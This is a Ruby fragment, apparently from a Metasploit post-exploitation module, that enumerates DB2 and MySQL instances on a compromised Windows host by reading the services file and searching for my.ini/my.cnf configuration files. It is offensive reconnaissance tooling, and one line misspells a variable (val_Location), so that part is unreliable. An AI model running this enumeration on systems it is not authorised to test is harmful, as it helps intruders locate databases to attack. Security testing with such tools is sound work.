if cmd_p =~ /\ ?TCP\/IP\ Service\ name[\ ]+\(SVCENAME\)\ =\ (\w+)/
port = $1
else
print_error("\t\t! could not identify instances information")
return results
end
windir = session.fs.file.expand_path("%windir%")
getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
data = nil
getfile.each do |file|
if exist?("#{file['path']}\\#{file['name']}")
data = read_file("#{file['path']}\\#{file['name']}")
break if not data.nil?
end
end
if data and data =~ /#{port}[\ \t]+(\d+)/
port_t = $1
else
print_error("\t\t! could not identify instances information")
return results
end
cmd_i.split("\n").compact.each do |line|
stripped=line.strip
print_good("\t\t+ #{stripped} (Port:#{port_t})")
results << [ "db2","instance:#{stripped} port:#{port_t}","DB2 Server",port_t ]
end
return results
rescue
print_error("\t\t! could not identify instances information")
return results || []
end
##### helper methods #####
def find_mysql_conf(val_location)
data = nil
if exist?(val_location + "\\my.ini")
data = read_file(val_Location + "\\my.ini")
elsif exist?(val_location + "\\my.cnf")
data = read_file(val_location + "\\my.cnf")
else
sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
getfile.each do |file|
if exist?("#{file['path']}\\#{file['name']}")
data = read_file("#{file['path']}\\#{file['name']}")
break
end
end
end
return data
end
end